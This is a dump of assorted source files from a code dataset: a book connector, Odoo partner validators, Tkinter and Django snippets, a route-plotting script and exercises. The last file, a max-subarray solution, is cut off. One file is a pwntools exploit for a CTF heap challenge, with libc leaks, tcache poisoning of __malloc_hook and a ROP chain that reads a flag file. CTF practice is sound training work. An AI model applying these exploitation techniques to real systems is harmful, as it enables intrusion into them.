parser.parse(date_string)\n except ValueError:\n return None\n\n\ndef get_data(url):\n ''' wrapper for request.get '''\n try:\n resp = requests.get(\n url,\n headers={\n 'Accept': 'application/json; charset=utf-8',\n },\n )\n except RequestError:\n raise ConnectorException()\n if not resp.ok:\n resp.raise_for_status()\n try:\n data = resp.json()\n except ValueError:\n raise ConnectorException()\n\n return data\n\n\ndef get_image(url):\n ''' wrapper for requesting an image '''\n try:\n resp = requests.get(url)\n except (RequestError, SSLError):\n return None\n if not resp.ok:\n return None\n return resp\n\n\n@dataclass\nclass SearchResult:\n ''' standardized search result object '''\n title: str\n key: str\n author: str\n year: str\n confidence: int = 1\n\n def 
__repr__(self):\n        return \"<SearchResult key={!r} title={!r} author={!r}>\".format(\n            self.key, self.title, self.author)\n\n\nclass Mapping:\n    ''' associate a local database field with a field in an external dataset '''\n    def __init__(\n            self, local_field, remote_field=None, formatter=None, model=None):\n        noop = lambda x: x\n\n        self.local_field = local_field\n        self.remote_field = remote_field or local_field\n        self.formatter = formatter or noop\n        self.model = model\n","sub_path":"bookwyrm/connectors/abstract_connector.py","file_name":"abstract_connector.py","file_ext":"py","file_size_in_byte":10661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"62994797","text":"# -*- coding: utf-8 -*-\n##############################################################################\n# For copyright and license notices, see __openerp__.py file in module root\n# directory\n##############################################################################\n\nfrom openerp import models, api\nfrom openerp.exceptions import ValidationError\nimport re\n\n\nclass ResPartner(models.Model):\n    _inherit = 'res.partner'\n\n    @api.multi\n    @api.constrains('responsability_id', 'document_type_id', 'street')\n    def _check_responsability(self):\n        for partner in self:\n            # check: Responsable Inscripto or Monotributo partners require a\n            # CUIT and an address\n            if partner.responsability_id.code == '1' or \\\n                    partner.responsability_id.code == '6':  # RI or Monotributo\n                if partner.document_type_id.name != 'CUIT':\n                    raise ValidationError(\n                        u'Para ingresar un cliente \"{}\" Se requiere CUIT'.\n                        format(partner.responsability_id.name))\n                if not partner.street:\n                    raise ValidationError(\n                        u'Para ingresar un cliente \"{}\" se requiere direccion'.\n                        format(partner.responsability_id.name))\n\n            if partner.responsability_id.code == '5':  # end consumer\n                if partner.document_type_id.code == 'Sigd':\n                    # This is the anonymous end consumer for invoices under $1000\n                    return True\n\n                if partner.document_type_id.name != 'DNI':\n                    raise ValidationError(\n                        u'Para ingresar un cliente \"{}\" al que le vamos \\n'\n                        u'a facturar mas de $1000 Se requiere DNI'.\n                        format(partner.responsability_id.name))\n                if not partner.street:\n                    raise ValidationError(\n                        u'Para ingresar un cliente \"{}\" al que le vamos \\n'\n                        u'a facturar mas de $1000 se requiere direccion'.\n                        format(partner.responsability_id.name))\n\n    @api.multi\n    @api.constrains('document_type_id', 'document_number')\n    def _check_unique_dni(self):\n        for partner in self:\n            if partner.document_type_id.name == 'DNI':\n                recordset = self.search(\n                    [('document_number', '=', partner.document_number)])\n                if len(recordset) > 1:\n                    raise ValidationError(\n                        u'El DNI {} ya está ingresado'.format(\n                            partner.document_number))\n\n    @api.multi\n    @api.constrains('vat', 'document_type_id')\n    def _check_unique_vat(self):\n        for partner in self:\n            if partner.document_type_id.name == 'CUIT':\n                recordset = self.search([('vat', '=', partner.vat)])\n                if len(recordset) > 1:\n                    raise ValidationError(\n                        u'El CUIT {}-{}-{} ya está ingresado'.format(\n                            partner.vat[2:4],\n                            partner.vat[4:12], partner.vat[12:13]))\n\n    @api.multi\n    @api.constrains('document_number')\n    def _check_document_type(self):\n        for partner in self:\n            # check that the DNI contains only digits\n            if partner.document_type_id.name == 'DNI':\n                if partner.document_number != re.sub(\"[^0-9]\",\n                                                     \"\",\n                                                     partner.document_number):\n                    raise ValidationError(\n                        u'El DNI \"{}\" debe contener solo numeros'.\n                        
format(partner.document_number))\n","sub_path":"partner_fiscal_constraints/models/res_partner.py","file_name":"res_partner.py","file_ext":"py","file_size_in_byte":3758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"378053152","text":"from Tkinter import *\n\nwindow = Tk()\nwindow.geometry(\"200x50\")\n\nframe = Frame()\nframe.pack()\n\nframe_left = Frame(bd=3, relief=SUNKEN)\nframe_left.place(relx=0, relwidth=0.6, relheight=1)\n\nframe_right = Frame(bd=3, relief=SUNKEN)\nframe_right.place(relx=0.6, relwidth=0.4)\n\nlabel_left = Label(frame_left, text=\"I've been framed!\")\nlabel_left.pack()\n\nlabel_right = Label(frame_right, text=\"So have I!\")\nlabel_right.pack()\n\n\nwindow.mainloop()\n","sub_path":"part1/chapter16/review_exercise2.1/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"433016592","text":"from pwn import *\n#r = remote('node3.buuoj.cn',25105)\nr = process('./hitcon_ctf_2019_one_punch')\nelf = ELF('./hitcon_ctf_2019_one_punch')\nlibc = ELF('./libc-2.29.so')\n\n\ndef add(index,name):\n\tr.recvuntil('> ')\n\tr.sendline('1')\n\tr.recvuntil('idx: ')\n\tr.sendline(str(index))\n\tr.recvuntil('hero name: ')\n\tr.send(name)\n\n\ndef edit(index,name):\n\tr.recvuntil('> ')\n\tr.sendline('2')\n\tr.recvuntil('idx: ')\n\tr.sendline(str(index))\n\tr.recvuntil('hero name: ')\n\tr.send(name)\n\ndef show(index):\n\tr.recvuntil('> ')\n\tr.sendline('3')\n\tr.recvuntil('idx: ')\n\tr.sendline(str(index))\n\ndef free(index):\n\tr.recvuntil('> ')\n\tr.sendline('4')\n\tr.recvuntil('idx: ')\n\tr.sendline(str(index))\n\ndef fuck(payload):\n\tr.recvuntil('> ')\n\tr.sendline('50056')\n\tr.sendline(payload)\n\nfor i in range(7):\n\tadd(0,'a'*0x200)\n\tfree(0)\nshow(0)\nr.recvuntil('hero name: ')\nleak = u64(r.recvuntil('\\n',drop=True).ljust(8,'\\x00'))\nheap_base = leak - 0xcb0\nlog.success(hex(heap_base))\nadd(0,'a'*0x200)\nadd(1,'./flag\\x00\\x00'+'a'*0x200)\nfree(0)\nshow(0)\nr.recvuntil('hero name: ')\nleak = u64(r.recvuntil('\\n',drop=True).ljust(8,'\\x00'))\nlibc_base = leak - 0x1e4ca0\nlog.success(hex(libc_base))\nadd(0,'a'*0x200)\n\nfor i in range(6):\n\tadd(0,'a'*0xf0)\n\tfree(0)\n\nfor i in range(7):\n\tadd(0,'a'*0x400)\n\tfree(0)\n\n\nadd(0,'b'*0x400)\nadd(2,'a'*0x400)\nfree(0)\nadd(2,'a'*0x300)\n\nadd(1,'c'*0x400)\nadd(2,'a'*0x400)\nfree(1)\nadd(2,'a'*0x300)\n\nadd(2,'a'*0x400)\n\nedit(1,'a'*0x300+p64(0)+p64(0x101)+p64(heap_base+0x3a60)+p64(heap_base+0x1b))\n\nadd(0,'a'*0x217)\nmalloc_hook = libc_base+libc.sym['__malloc_hook']\nfree(0)\nedit(0,p64(malloc_hook))\n\nadd(1,'x'*0xf0)\n\nlog.success(hex(malloc_hook))\n\nadd_rsp_0x48_r = libc_base + 0x8cfd6\nfuck(p64(add_rsp_0x48_r))\nfuck(p64(add_rsp_0x48_r))\n\np_rdi = libc_base + 0x26542\np_rsi = libc_base + 0x26f9e\np_rdx = libc_base + 0x12bda6\np_rax = libc_base + 0x47cf8\nsyscall = libc_base + 0xcf6c5\n\n#open\npayload = p64(p_rdi)+p64(heap_base+0x12e0)\npayload += p64(p_rsi)+p64(0)\npayload += p64(p_rdx)+p64(0)\npayload += p64(p_rax)+p64(2)\npayload += p64(syscall)\n\n#read\npayload += p64(p_rdi)+p64(3)\npayload += p64(p_rsi)+p64(heap_base+0x12e0)\npayload += p64(p_rdx)+p64(0x70)\npayload += p64(p_rax)+p64(0)\npayload += p64(syscall)\n\n#write\npayload += p64(p_rdi)+p64(1)\npayload += p64(p_rsi)+p64(heap_base+0x12e0)\npayload += p64(p_rdx)+p64(0x70)\npayload += p64(p_rax)+p64(1)\npayload += 
p64(syscall)\nlog.info(hex(len(payload)))\nadd(0,payload)\nr.interactive()\n","sub_path":"pwn/hitcon_ctf_2019_one_punch/fuck.py","file_name":"fuck.py","file_ext":"py","file_size_in_byte":2402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"19278880","text":"# Python3 code to find sequences of one upper \n# case letter followed by lower case letters\n\n#import re \nimport string\n# Function to add more values for String\ndef fStringAdd(str, word):\n return str[:len(str)] + word + str[len(str):]\ndef fStringRead(str):\n return str[:len(str)]\n\n# Function to catch the string and put on a array.\ndef PutArray(text, z): #the parameter must be a string\n a = str(string.ascii_lowercase) #Alfabeto minusculo\n b = str(string.ascii_uppercase) #Alfabeto maiusculo\n a = fStringAdd(a, \"ãáàâçéèêíìîóòôõúùû\")\n b = fStringAdd(b, \"ÃÁÀÂÇÉÈÊÍÌÎÓÒÔÕÚÙÛ\")\n #print(a)\n #print(b)\n li = [] #Array principal para adição de nomes\n nUltCount = 0\n for x in range (z, len(text)):\n if text[x] in b:\n li.append(text[x])\n nUltCount = len(li)-1\n d = x\n #print(li)\n #print(\"Esta é a ultima letra do texto \", fStringRead(li[nUltCount]))\n #print(\"text[x] \",text[x])\n if fStringRead(li[nUltCount]) in b: #irá adicionar as letras minusculas apenas se a ultima letra adicionada na str for maiuscula\n for k in range (x+1, len(text)): #laço que da continuidade da posição da str\n nUltCount = len(li)-1\n if text[k] != fStringRead(li[nUltCount]):\n if text[k] in b:\n li[nUltCount] = fStringAdd(li[nUltCount], text[k])\n nUltCount = len(li)-1\n for minu in range (len(a)): #laço para montar a palavra adicionando as letras minusculas\n if text[k] == a[minu]:\n li[nUltCount] = fStringAdd(li[nUltCount], text[k])\n nUltCount = len(li)-1\n if text[k] == \" \":\n li[nUltCount] = fStringAdd(li[nUltCount], text[k]) #Adicionar espaço\n nUltCount = len(li)-1\n break #saindo do comando quando encontrar espaço\n if text[k] == \"–\": #Ao chegar aqui significa que chegou ao final de um nome.\n zzz = k\n break \n if text[k] == \"–\":\n #print(\"esta é a variavel z \", z)\n #print(\"este é o array da função \", li)\n #print(\"este será o retorno \", zzz)\n break\n if text[k] == \",\" or text[k] == \"–\":\n break\n #print(\"variavel x \", x)\n zzz = x\n \n return li, zzz\n\ndef fTratNome (array): #Irá manter apenas os dois nomes de acordo com texto da mari\n stringss = array\n if \"faz \" in stringss:\n setr = stringss.replace(stringss[:stringss.index(\"faz \")], \"\")\n elif \"faz a \" in stringss:\n setr = stringss.replace(stringss[:stringss.index(\"faz a \")], \"\")\n elif \"faz as \" in stringss:\n setr = stringss.replace(stringss[:stringss.index(\"faz as \")], \"\")\n elif \"faz à \" in stringss:\n setr = stringss.replace(stringss[:stringss.index(\"faz à \")], \"\")\n elif \"faz às \" in stringss:\n setr = stringss.replace(stringss[:stringss.index(\"faz às \")], \"\")\n elif \"faz o \" in stringss:\n setr = stringss.replace(stringss[:stringss.index(\"faz o \")], \"\")\n elif \"faz os \" in stringss:\n setr = stringss.replace(stringss[:stringss.index(\"faz os \")], \"\")\n elif \"fazem \" in stringss:\n setr = stringss.replace(stringss[:stringss.index(\"fazem \")], \"\")\n elif \"fazem o \" in stringss:\n setr = stringss.replace(stringss[:stringss.index(\"fazem o \")], \"\")\n elif \"fazem os \" in stringss:\n setr = stringss.replace(stringss[:stringss.index(\"fazem os \")], \"\")\n elif \"fazem a \" in stringss:\n setr = stringss.replace(stringss[:stringss.index(\"fazem a \")], 
\"\")\n elif \"fazem as \" in stringss:\n setr = stringss.replace(stringss[:stringss.index(\"fazem as \")], \"\")\n elif \"fazem à \" in stringss:\n setr = stringss.replace(stringss[:stringss.index(\"fazem a \")], \"\")\n elif \"fazem às \" in stringss:\n setr = stringss.replace(stringss[:stringss.index(\"fazem as \")], \"\")\n\n setr = setr.replace(\"faz \", \"\")\n setr = setr.replace(\"fazem o \", \"\")\n if \" ao \" in setr:\n setr = setr.replace(\" ao \", \",\")\n elif \" a \" in setr:\n setr = setr.replace(\" a \", \",\")\n elif \" à \" in setr:\n setr = setr.replace(\" à \", \",\")\n if \"no valor de réis\" in setr:\n setr = setr.replace(\"no valor de réis\", \"\")\n return setr\n\n\n #\\\n \n# Driver Function\ntext = [] #Lista com apenas Escrituras\nAN = [] #Lista de códigos --> será processado outro dia.\nliz = [] #lista que trará nomes para serem tratados\naFinalResult = [[],[]] #Lista que irá conter todos os nomes\ntext1 = \"\"\"AN, 1ON, 50, p. 15v; AGCRJ, Códice 42-3-56, p. 128\nData - 1670\nDescrição\nEscritura de venda de chãos que faz Antonio Álvares a Domingos Rodrigues Durões, no valor de 36 réis – com três braças de testada, sitos na rua de Mateus de Freitas, partindo de uma banda com casas de Ana Pinta, sogra dele vendedor e da outra com chãos de Antonio Ferreira da Silva, havidos por legítima de seu [sogro] Antonio Fernandes [Lugo].\n\n\n\nAN, 1ON, 50, p. 65; AGCRJ, Códice 42-3-56, p. 136\nData - 1670\nDescrição\nEscritura de doação de chãos para instituição de patrimônio que fazem o Doutor Francisco da Fonseca [Diniz, médico do presídio do Rio de Janeiro desde 1663 - ABN, 39, p. 102, por alcunha \"o Gadelha\"] e sua mulher Isabel Rangel [de Macedo] ao Licenciado Jorge de Oliveira – com três braças de testada e 12 de quintal, sitos na rua de Aleixo Manoel, o velho, caminho da pabuna, partindo de uma banda com casas do doador e da outra com chãos de quem de direito, [comprados de Eusébio Dias Cardoso e sua mulher Francisca da Costa Homem em 21/11/1653 – 1º Ofício?]\n\n\"\"\"\ntext1 = text1.split(\"\\n\") # irá dividir todo o texto e transformar a string em lista\nfor i in range (len(text1)-1,-1,-1): #Laço para retirar todas as posições desnecessárias\n if text1[i] == '' or text1[i] == 'Descrição':\n del(text1[i])\n opo = i\n opo -= 1 \n if \"Escritura\" in text1[opo]: #Condição que irá adicionar as Escrituras (que tem os nomes) na variável [text]\n text.append(text1[opo])\n \nfor p in range (len(text)):\n try:\n text[p] = text[p].replace(text[p][text[p].index(\"[\"):text[p].index(\"]\")], \"\")\n except ValueError:\n continue\n\n\ncount = 0\nfor i in range (len(text)):\n while count != len(text[i])-1:\n funct = []\n funct.append(PutArray(text[i], count))\n liz.append(funct[0][0][0])\n count = funct[0][1]\n if text[i][count] == \",\" or text[i][count] == \"–\":\n break\n count = 0\ninput(liz)\nfor u in range (len(liz)):\n aFinalResult[0].append(fTratNome(liz[u]))\n aFinalResult[1].append(fTratNome(liz[u]))\nprint(aFinalResult)\n\n\n\n\n","sub_path":"regexReplace.py","file_name":"regexReplace.py","file_ext":"py","file_size_in_byte":7118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"645320614","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport os\nimport numpy as np\nimport torch\nfrom torch.utils.data import DataLoader\nimport pandas as pd\nfrom sklearn.preprocessing import MinMaxScaler\n\nimport matplotlib\nmatplotlib.rcParams[\"font.sans-serif\"] = [\"SimHei\"]\nfrom geopy.distance import 
geodesic, great_circle\n\nfrom matplotlib import pyplot as plt\nfrom matplotlib.collections import PatchCollection\nfrom matplotlib.patches import Rectangle\nfrom matplotlib.backends.backend_pdf import PdfPages\n\n\nfrom utils import load_model\nfrom problems import CVRP\n\n\n\n# Code inspired by Google OR Tools plot:\n# https://github.com/google/or-tools/blob/fb12c5ded7423d524fc6c95656a9bdc290a81d4d/examples/python/cvrptw_plot.py\n\ndef discrete_cmap(N, base_cmap=None):\n \"\"\"\n Create an N-bin discrete colormap from the specified input map\n \"\"\"\n # Note that if base_cmap is a string or None, you can simply do\n # return plt.cm.get_cmap(base_cmap, N)\n # The following works for string, None, or a colormap instance:\n\n base = plt.cm.get_cmap(base_cmap)\n color_list = base(np.linspace(0, 1, N))\n cmap_name = base.name + str(N)\n return base.from_list(cmap_name, color_list, N)\n\ndef plot_vehicle_routes(data, route, ax1, markersize=5, visualize_demands=False, demand_scale=1, round_demand=False):\n \"\"\"\n Plot the vehicle routes on matplotlib axis ax1.\n \"\"\"\n \n # route is one sequence, separating different routes with 0 (depot)\n routes = [r[r!=0] for r in np.split(route.cpu().numpy(), np.where(route==0)[0]) if (r != 0).any()]\n depot = data['depot'].cpu().numpy()\n locs = data['loc'].cpu().numpy()\n demands = data['demand'].cpu().numpy() * demand_scale\n capacity = demand_scale # Capacity is always 1\n \n x_dep, y_dep = depot\n ax1.plot(x_dep, y_dep, 'sk', markersize=markersize*4)\n ax1.set_xlabel(\"longitude\")\n ax1.set_ylabel(\"latitude\")\n \n legend = ax1.legend(loc='upper center')\n \n cmap = discrete_cmap(len(routes) + 2, 'nipy_spectral')\n dem_rects = []\n used_rects = []\n cap_rects = []\n qvs = []\n total_dist = 0\n for veh_number, r in enumerate(routes):\n color = cmap(len(routes) - veh_number) # Invert to have in rainbow order\n \n route_demands = demands[r - 1]\n coords = locs[r - 1, :]\n xs, ys = coords.transpose()\n\n total_route_demand = sum(route_demands)\n #assert total_route_demand <= capacity\n if not visualize_demands:\n ax1.plot(xs, ys, 'o', mfc=color, markersize=markersize, markeredgewidth=0.0)\n \n dist = 0\n x_prev, y_prev = x_dep, y_dep\n cum_demand = 0\n for (x, y), d in zip(coords, route_demands):\n dist += great_circle((y, x), (y_prev, x_prev)).km\n # dist += np.sqrt((x - x_prev) ** 2 + (y - y_prev) ** 2)\n \n cap_rects.append(Rectangle((x, y), 0.01, 0.1))\n used_rects.append(Rectangle((x, y), 0.01, 0.1 * total_route_demand / capacity))\n dem_rects.append(Rectangle((x, y + 0.1 * cum_demand / capacity), 0.01, 0.1 * d / capacity))\n \n x_prev, y_prev = x, y\n cum_demand += d\n\n dist += great_circle((y_dep, x_dep), (y_prev, x_prev)).km\n # dist += np.sqrt((x_dep - x_prev) ** 2 + (y_dep - y_prev) ** 2)\n total_dist += dist\n qv = ax1.quiver(\n xs[:-1],\n ys[:-1],\n xs[1:] - xs[:-1],\n ys[1:] - ys[:-1],\n scale_units='xy',\n angles='xy',\n scale=1,\n color=color,\n label='R{}, # {}, d {:.2f}'.format(\n veh_number, \n len(r), \n # int(total_route_demand) if round_demand else total_route_demand,\n # int(capacity) if round_demand else capacity,\n dist\n )\n )\n \n qvs.append(qv)\n \n ax1.set_title('{} routes, total distance {:.2f}'.format(len(routes), total_dist))\n ax1.legend(handles=qvs)\n \n pc_cap = PatchCollection(cap_rects, facecolor='whitesmoke', alpha=1.0, edgecolor='lightgray')\n pc_used = PatchCollection(used_rects, facecolor='lightgray', alpha=1.0, edgecolor='lightgray')\n pc_dem = PatchCollection(dem_rects, facecolor='black', alpha=1.0, 
edgecolor='black')\n \n if visualize_demands:\n ax1.add_collection(pc_cap)\n ax1.add_collection(pc_used)\n ax1.add_collection(pc_dem)\n return len(routes), total_dist\n\ndef test_custom_data(filename, savename=None, demand=.1):\n assert os.path.splitext(filename)[-1] == '.xlsx'\n df = pd.read_excel(filename)\n normalization = MinMaxScaler()\n dfDescribe = df.describe().loc[[\"min\", \"max\"], [\"longitude\", \"latitude\"]]\n dfDescribe = dfDescribe.T\n dfDescribe[\"span\"] = dfDescribe[\"max\"] - dfDescribe[\"min\"]\n df = normalization.fit_transform(df[[\"longitude\", \"latitude\"]])\n model, _ = load_model('pretrained/cvrp_50/')\n torch.manual_seed(1234)\n\n dataset = CVRP.make_custom_dataset(df, demand=demand)\n # Need a dataloader to batch instances\n dataloader = DataLoader(dataset, batch_size=1000)\n\n # Make var works for dicts\n batch = next(iter(dataloader))\n\n # Run the model\n model.eval()\n model.set_decode_type('greedy')\n with torch.no_grad():\n length, log_p, tours = model(batch, return_pi=True)\n print([0] + list(i.item() for i in tours[0].data) + [0])\n\n # [[0, 22, 28, 24, 23, 21, 0],\n # [0, 17, 29, 26, 25, 18, 19, 20, 1, 0],\n # [0, 9, 7, 6, 11, 14, 15, 8, 12, 2, 0],\n # [0, 10, 16, 27, 13, 5, 3, 4, 0]]\n # Plot the results\n for i, (data, tour) in enumerate(zip(dataset, tours)):\n fig, ax = plt.subplots(figsize=(10, 10))\n data[\"loc\"][:, 0] = dfDescribe.loc[\"longitude\", \"span\"]*data[\"loc\"][:, 0] + dfDescribe.loc[\"longitude\", \"min\"]\n data[\"loc\"][:, 1] = dfDescribe.loc[\"latitude\", \"span\"]*data[\"loc\"][:, 1] + dfDescribe.loc[\"latitude\", \"min\"]\n data[\"depot\"][0] = dfDescribe.loc[\"longitude\", \"span\"]*data[\"depot\"][0] + dfDescribe.loc[\"longitude\", \"min\"]\n data[\"depot\"][1] = dfDescribe.loc[\"latitude\", \"span\"]*data[\"depot\"][1] + dfDescribe.loc[\"latitude\", \"min\"]\n numV, length = plot_vehicle_routes(data, tour, ax, visualize_demands=False, demand_scale=50, round_demand=True)\n\n if savename is not None:\n pdf = PdfPages(\"images//cvrp_\"+savename+\".pdf\")\n pdf.savefig()\n pdf.close()\n # else:\n # plt.show()\n plt.close()\n return numV, length\n\ndef plot_(x, y1, y2, savename=None):\n # plt.rcParams['font.sans-serif'] = ['Microsoft YaHei']\n fig = plt.figure()\n ax1 = fig.add_subplot(111)\n ax1.plot(x, y1, 'r', label=\"right\");\n ax1.set_ylabel('充电车数量');\n ax1.set_yticks([3,4,5])\n ax2 = ax1.twinx() # this is the important function\n ax2.plot(x, y2, 'g', label=\"left\")\n ax2.set_ylabel('总路程');\n ax2.set_xlabel('delta');\n ax2.set_ylim([0, 17]);\n\n if savename is not None:\n pdf = PdfPages(\"images//\"+savename+\".pdf\")\n pdf.savefig()\n pdf.close()\n\nif __name__ == '__main__':\n x = np.arange(0.06, 0.16, 0.005)\n ncs = []\n lens = []\n for d in x:\n nc, length = test_custom_data(\"../data/data.xlsx\", demand=d, savename=\"result03_{:.2f}\".format(d))\n ncs.append(nc)\n lens.append(length)\n plot_(x, ncs, lens, \"sensitivity\")\n\n\n","sub_path":"第3场训练赛/charging route planning/attention-learn-to-route-master/plot_vrp.py","file_name":"plot_vrp.py","file_ext":"py","file_size_in_byte":7378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"168125965","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib.auth.decorators import login_required, permission_required\nfrom django.http import request\nfrom django.views.generic import TemplateView\nfrom tasks import views as tv\n\nurlpatterns = patterns('',\n\n\n url(r'^$', tv.open_tasks, 
name=\"all_tasks\"),\n url(r'^(?P\\d+)/solutions/$', tv.get_all_solutions, name=\"all_solutions\"),\n url(r'^(?P\\d+)/solutions/(?P\\d+)/$', tv.get_solution, name=\"get_solution\"),\n url(r'^(?P\\d+)/solutions/add/$', tv.add_solution, name=\"add_solution\"),\n url(r'^(?P\\d+)/status/change/(?P\\d+)/$', tv.change_status, name=\"change_status\"),\n url(r'^(?P\\d+)/$', tv.get_task, name=\"get_task\"),\n url(r'^add/$', tv.add_task, name=\"add_task\"),\n url(r'^edit/(?P\\d+)/$', tv.edit_task, name=\"edit_task\"),\n url(r'^delete/(?P\\d+)/$', tv.delete_task, name=\"delete_task\"),\n url(r'^hidden/$', tv.hidden_tasks, name=\"get_hidden_task\"),\n url(r'^language/(?P[^/]+)/$', tv.language_tasks, name=\"tasks_lang\"),\n url(r'^show/$', permission_required('tasks.File')(TemplateView.as_view(template_name='show.html')), name='test'),\n url(r'^show/files/$', tv.show_files, name='files_all'),\n url(r'^show/code/(?P\\d+)/$', tv.show_code, name='get_code'),\n\n\n)","sub_path":"tasks/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"651147396","text":"#!/usr/bin/env python3\n#-*- encoding: UTF-8 -*-\n\ndef main():\n try:\n number1 = int(input(\"Informe um número: \"))\n number2 = int(input(\"Informe outro número: \"))\n except:\n print(\"Apenas valores numéricos são aceitos!\")\n \n if(number1 > number2):\n print(f\"{number1} é maior que {number2}. A diferença entre eles é de {number1 - number2}.\")\n elif(number2 > number1):\n print(f\"{number2} é maior que {number1}. A diferença entre eles é de {number2 - number1}.\")\n else:\n print(f\"Números iguais!\")\n\nif(__name__ == \"__main__\"):\n main()\n","sub_path":"Lista 02/Questao7.py","file_name":"Questao7.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"403890982","text":"import tkinter as tk\n\n\ndef main():\n window = tk.Tk()\n tk.Label(window, text=\"Name:\").grid(row=0, column=0, sticky=tk.W)\n ent_name = tk.Entry(window)\n ent_name.grid(row=0, column=1)\n\n tk.Label(window, text=\"Email address: \").grid(row=1, column=0, sticky=tk.W)\n ent_email = tk.Entry(window)\n ent_email.grid(row=1, column=1)\n\n chk_remember = tk.Checkbutton(window, text=\"Remember me...\")\n chk_remember.grid(row=2, column=0, columnspan=2)\n\n btn_submit = tk.Button(window, text=\"Submit\")\n btn_submit.grid(row=2, column=2)\n\n window.mainloop()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Day2/gui3.py","file_name":"gui3.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"424333427","text":"from p7_integration_tests.base_test_case import BaseTestCase\nfrom testfixtures import LogCapture\nimport spynnaker7.pyNN as p\n\n\nclass TestGetWeightsAfterRuns(BaseTestCase):\n\n def test_run(self):\n with LogCapture() as l:\n p.setup()\n p1 = p.Population(1, p.IF_curr_exp, {})\n p2 = p.Population(1, p.IF_curr_exp, {})\n\n proj = p.Projection(p1, p2, p.AllToAllConnector())\n\n p.run(500)\n\n proj.getWeights()\n\n p.run(500)\n\n proj.getWeights()\n\n p.end()\n self.assert_logs_messages(\n l.records, \"Getting weights\", 'INFO', 2)\n\n\nif __name__ == '__main__':\n x = TestGetWeightsAfterRuns()\n 
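# run the test directly, outside of a unit-test runner
 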
x.test_run()\n","sub_path":"p7_integration_tests/get_weights_multi_run/test_get_weights_from_projection_over_multiple_runs.py","file_name":"test_get_weights_from_projection_over_multiple_runs.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"31540441","text":"def main():\n s1 = input(\"first string: \")\n s2 = input(\"second string: \")\n s3 = input(\"third string: \")\n\n words = [s1,s2,s3]\n\n print(\"The strings, by increasing length, are:\")\n\n short = shortest(words)\n for word in short:\n print(\" \", word)\n\ndef shortest(array):\n # sort the three strings by increasing length with three compare-and-swap\n # steps; the original nested-if version left the list unsorted whenever\n # only the last two strings were out of order\n if len(array[0]) > len(array[1]):\n array[0], array[1] = array[1], array[0]\n if len(array[1]) > len(array[2]):\n array[1], array[2] = array[2], array[1]\n if len(array[0]) > len(array[1]):\n array[0], array[1] = array[1], array[0]\n\n return array\n\nmain()\n","sub_path":"final/ekahi/stringy.py","file_name":"stringy.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"632295598","text":"def isname(x):\n return x in ['Allen', 'Tom', 'Marvin']\ndef read_file(x = 'filename'):\n lines = []\n with open(x, 'r', encoding = 'utf-8-sig') as infile:\n for line in infile:\n line = line.strip()\n lines.append(line)\n return lines\ndef convert(lines):\n record = []\n name = None\n for line in lines:\n if isname(line):\n name = line\n continue\n if name:\n record.append(name + ': '+line) \n return record\ndef write_file(x, y):\n with open(x, 'w', encoding = 'utf-8-sig') as outfile:\n for line in y:\n outfile.write(line + '\\n')\ndef main():\n lines = read_file('input.txt')\n record = convert(lines)\n write_file('output.txt', record)\nmain()","sub_path":"chating_record.py","file_name":"chating_record.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"37050342","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n# @Time : 11/28/2018 09:15\n# @Author : mingfei.net@gmail.com\n# @FileName : step4_select.py\n# @GitHub : https://github.com/thu/Python-Demo-A\n\nimport mysql.connector\n\nconnection = mysql.connector.connect(\n user='root',\n password='system'\n)\n\ncursor = connection.cursor()\n\ncursor.execute('select * from db_python.user')\n\nrows = cursor.fetchall()\n\nfor row in rows:\n print(row)\n\ncursor.execute('''\n select * from db_python.book\n where id < 10\n order by title desc \n limit 5 offset 0\n''')\n\nprint('-----------------------')\n\nrows = cursor.fetchall()\n\nfor row in rows:\n print(row)\n","sub_path":"day08/mysql_test/step4_select.py","file_name":"step4_select.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"628038656","text":"\"\"\"\nProblem description:\nGiven an integer array containing both positive and negative numbers,\none or more consecutive elements form a subarray. Find the maximum sum\nover all subarrays. Required time complexity: O(n).\n\nApproach:\nThe key is analysing the whole process. Keep a running sum of the current\nsubarray: when the running sum drops below zero, restart it at the next\nelement; otherwise add the next element to it. Track the largest sum seen\nso far and update it as you go. The problem can also be solved with\ndynamic programming.\n\"\"\"\n\nclass Solution:\n def FindGreatestSumOfSubArray(self, array):\n if array is None or len(array) <= 0:\n return 0\n nCurSum = 0\n nGreatestSum = array[0]\n for i in array:\n if nCurSum <= 0:\n nCurSum = i\n else:\n nCurSum += 
